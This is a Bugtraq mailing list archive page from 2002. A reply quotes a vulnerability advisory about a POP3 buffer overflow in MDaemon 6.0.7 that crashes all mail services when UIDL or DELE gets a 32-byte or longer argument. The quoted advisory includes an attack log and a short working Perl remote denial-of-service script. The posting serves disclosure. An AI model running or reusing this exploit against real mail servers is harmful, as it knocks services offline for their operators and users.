Bugtraq mailing list archives
Re: MDaemon SMTP/POP/IMAP server DoS
From: Muhammad Faisal Rauf Danka <mfrd () attitudex com>
Date: Mon, 28 Oct 2002 16:57:05 -0800 (PST)
There have been earlier issues with UIDL and DoS conditions in MDaemon 2.8.5.0 (to be specific). Check bid 1366, http://online.securityfocus.com/bid/1366/ The website still offers 6.0.7 (vulnerable) version for download, So apparently no workaround exists except for shutting it down until the patch or newer version is available. Regards -------- Muhammad Faisal Rauf Danka Head of GemSEC / Chief Technology Officer Gem Internet Services (Pvt) Ltd. web: www.gem.net.pk Key Id: 0x784B0202 Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 784B 0202 --- D4rkGr3y <grey_1999 () mail ru> wrote:
###################################################### #Product: MDaemon SMTP/POP/IMAP server # #Authors: Alt-N Technologies Ltd [www.mdaemon.com] # #Vulnerable versions: v.6.0.7 and bellow # #Vulnerability: buffer overflow # #Bug&exploit by D4rkGr3y [www.dhgroup.org] # ###################################################### #Overview#--------------------------------------------------------------# From MDaemon's help file: "MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services commonplace on UNIX hosts and the Internet to Windows based servers and microcomputers. MDaemon is designed to manage the email needs of any number of individual users and comes complete with a powerful set of integrated tools for managing mail accounts and message formats. MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete with LDAP support, an integrated browser-based email client, content filtering, spam blockers, extensive security features, and more." #Problem#----------------------------------------------------------------# Bug founded in MDaemon's pop-server. It's possible to kill MDaemon by sending long arguments (32b and above) with DELE or UIDL commands. To do this u must have at least mail-account on vulnerable host. After geting long request from client, all MDaemon's Services will be closed (smtp, imap, pop, (?)worldclient). Here the log of attack on local MDaemon POP-server: +OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7 <MDAEMON-F200210 271036.AA3656130MD0012 () dark ru> USER D4rkGr3y +OK D4rkGr3y... Recipient ok PASS cool-pass +OK D4rkGr3y () dark ru's mailbox has 1 total messages (18356 octets). UIDL 11111111111111111111111111111111 Connection to host lost... #Exploit#----------------------------------------------------------------# #!/usr/bin/perl #MDaemon SMTP/POP/IMAP server remote DoS exploit by D4rkGr3y use IO::Socket; $host = "[vuln_host]"; $login = "[login]"; $pass = "[pass]"; $port = "110"; $data = "1"; $num = "32"; $buf .= $data x $num; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect: @!\n"; print $socket "USER $login\n"; print $socket "PASS $user\n"; print $socket "UIDL $buf\n"; close($socket); #EOF Best regards www.dhgroup.org D4rkGr3y icq 540981
_____________________________________________________________ --------------------------- [ATTITUDEX.COM] http://www.attitudex.com/ --------------------------- _____________________________________________________________ Select your own custom email address for FREE! Get you () yourchoice com w/No Ads, 6MB, POP & more! http://www.everyone.net/selectmail?campaign=tag
Current thread:
- MDaemon SMTP/POP/IMAP server DoS D4rkGr3y (Oct 28)
- RE: MDaemon SMTP/POP/IMAP server DoS Basil Hussain (Oct 29)
- RE: MDaemon SMTP/POP/IMAP server DoS Robert Feldbauer (Oct 29)
- <Possible follow-ups>
- Re: MDaemon SMTP/POP/IMAP server DoS Muhammad Faisal Rauf Danka (Oct 29)
- RE: MDaemon SMTP/POP/IMAP server DoS Basil Hussain (Oct 30)
- RE: MDaemon SMTP/POP/IMAP server DoS Basil Hussain (Oct 29)